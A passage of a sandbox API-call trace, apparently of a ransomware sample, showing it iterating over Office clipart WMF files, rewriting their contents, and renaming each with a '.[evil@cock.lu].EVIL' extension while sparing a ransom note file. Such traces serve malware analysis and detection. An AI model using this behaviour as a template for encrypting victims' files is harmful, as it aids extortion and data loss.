hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x3d60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3d60, lpOverlapped=0x0) returned 1 [0127.857] CloseHandle (hObject=0x1a8) returned 1 [0127.857] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.858] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.858] __uncaught_exception () returned 0x84b1160800 [0127.858] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.858] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089992.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089992.wmf.[evil@cock.lu].evil")) returned 1 [0127.859] ??_V@YAXPEAX@Z () returned 0x1 [0127.861] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF", dwFileAttributes=0x200) returned 0 [0127.862] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.862] wcsstr (_Str="J0090027.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.862] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF") returned 69 [0127.862] wcscmp (_String1="J0090027.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.862] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0090027.WMF") returned 0x0 [0127.862] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF") returned 0x45 [0127.862] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090027.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.866] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5314, lpOverlapped=0x0) returned 1 [0127.882] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.882] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.882] _errno () returned 0x84b1160840 [0127.882] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.882] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x5320, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5320, lpOverlapped=0x0) returned 1 [0127.883] CloseHandle (hObject=0x1a8) returned 1 [0127.883] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.883] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.883] __uncaught_exception () returned 0x84b1160800 [0127.883] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.883] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090027.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090027.wmf.[evil@cock.lu].evil")) returned 1 [0127.884] ??_V@YAXPEAX@Z () returned 0x1 [0127.887] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF", dwFileAttributes=0x200) returned 0 [0127.887] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.887] wcsstr (_Str="J0090087.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.887] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF") returned 69 [0127.887] wcscmp (_String1="J0090087.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.887] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0090087.WMF") returned 0x0 [0127.887] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF") returned 0x45 [0127.887] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090087.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.889] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb758, lpOverlapped=0x0) returned 1 [0127.903] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.903] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.903] _errno () returned 0x84b1160840 [0127.903] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.903] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xb760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb760, lpOverlapped=0x0) returned 1 [0127.903] CloseHandle (hObject=0x1a8) returned 1 [0127.903] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.903] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.904] __uncaught_exception () returned 0x84b1160800 [0127.904] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.904] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090087.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090087.wmf.[evil@cock.lu].evil")) returned 1 [0127.904] ??_V@YAXPEAX@Z () returned 0x1 [0127.907] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF", dwFileAttributes=0x200) returned 0 [0127.907] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.907] wcsstr (_Str="J0090089.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.908] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF") returned 69 [0127.908] wcscmp (_String1="J0090089.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.908] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0090089.WMF") returned 0x0 [0127.908] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF") returned 0x45 [0127.908] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090089.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.910] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3d90, lpOverlapped=0x0) returned 1 [0127.919] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.919] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.919] _errno () returned 0x84b1160840 [0127.919] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.919] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x3da0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3da0, lpOverlapped=0x0) returned 1 [0127.919] CloseHandle (hObject=0x1a8) returned 1 [0127.919] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.919] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.920] __uncaught_exception () returned 0x84b1160800 [0127.920] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.920] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090089.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090089.wmf.[evil@cock.lu].evil")) returned 1 [0127.920] ??_V@YAXPEAX@Z () returned 0x1 [0127.923] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF", dwFileAttributes=0x200) returned 0 [0127.923] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.923] wcsstr (_Str="J0090149.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.923] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF") returned 69 [0127.923] wcscmp (_String1="J0090149.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.923] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0090149.WMF") returned 0x0 [0127.923] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF") returned 0x45 [0127.923] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090149.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.925] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6e34, lpOverlapped=0x0) returned 1 [0127.935] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.935] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.935] _errno () returned 0x84b1160840 [0127.935] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.935] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x6e40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6e40, lpOverlapped=0x0) returned 1 [0127.936] CloseHandle (hObject=0x1a8) returned 1 [0127.936] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.936] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.936] __uncaught_exception () returned 0x84b1160800 [0127.936] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.936] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090149.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090149.wmf.[evil@cock.lu].evil")) returned 1 [0127.937] ??_V@YAXPEAX@Z () returned 0x1 [0127.940] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF", dwFileAttributes=0x200) returned 0 [0127.940] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.940] wcsstr (_Str="J0090390.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.940] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF") returned 69 [0127.940] wcscmp (_String1="J0090390.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.940] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0090390.WMF") returned 0x0 [0127.940] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF") returned 0x45 [0127.940] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090390.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.942] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x44e6, lpOverlapped=0x0) returned 1 [0127.952] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.952] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.952] _errno () returned 0x84b1160840 [0127.952] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.952] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x4500, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4500, lpOverlapped=0x0) returned 1 [0127.953] CloseHandle (hObject=0x1a8) returned 1 [0127.953] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.953] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.953] __uncaught_exception () returned 0x84b1160800 [0127.953] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.953] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090390.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090390.wmf.[evil@cock.lu].evil")) returned 1 [0127.954] ??_V@YAXPEAX@Z () returned 0x1 [0127.956] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF", dwFileAttributes=0x200) returned 0 [0127.957] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.957] wcsstr (_Str="J0090777.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.957] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF") returned 69 [0127.957] wcscmp (_String1="J0090777.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.957] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0090777.WMF") returned 0x0 [0127.957] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF") returned 0x45 [0127.957] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090777.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.959] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd04, lpOverlapped=0x0) returned 1 [0127.974] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.974] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.974] _errno () returned 0x84b1160840 [0127.974] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.974] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd20, lpOverlapped=0x0) returned 1 [0127.975] CloseHandle (hObject=0x1a8) returned 1 [0127.975] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.975] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.975] __uncaught_exception () returned 0x84b1160800 [0127.975] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.975] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090777.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090777.wmf.[evil@cock.lu].evil")) returned 1 [0127.976] ??_V@YAXPEAX@Z () returned 0x1 [0127.978] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF", dwFileAttributes=0x200) returned 0 [0127.979] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.979] wcsstr (_Str="J0090779.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.979] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF") returned 69 [0127.979] wcscmp (_String1="J0090779.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.979] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0090779.WMF") returned 0x0 [0127.979] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF") returned 0x45 [0127.979] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090779.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.981] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5b0, lpOverlapped=0x0) returned 1 [0127.994] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.994] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.994] _errno () returned 0x84b1160840 [0127.995] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.995] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5c0, lpOverlapped=0x0) returned 1 [0127.995] CloseHandle (hObject=0x1a8) returned 1 [0127.995] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.995] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.995] __uncaught_exception () returned 0x84b1160800 [0127.995] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.995] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090779.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090779.wmf.[evil@cock.lu].evil")) returned 1 [0127.996] ??_V@YAXPEAX@Z () returned 0x1 [0127.999] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF", dwFileAttributes=0x200) returned 0 [0127.999] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.999] wcsstr (_Str="J0090781.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.999] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF") returned 69 [0127.999] wcscmp (_String1="J0090781.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.999] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0090781.WMF") returned 0x0 [0127.999] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF") returned 0x45 [0127.999] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090781.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0128.001] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x14c2, lpOverlapped=0x0) returned 1 [0128.019] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.019] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.019] _errno () returned 0x84b1160840 [0128.019] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.019] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x14e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14e0, lpOverlapped=0x0) returned 1 [0128.019] CloseHandle (hObject=0x1a8) returned 1 [0128.020] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0128.020] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0128.020] __uncaught_exception () 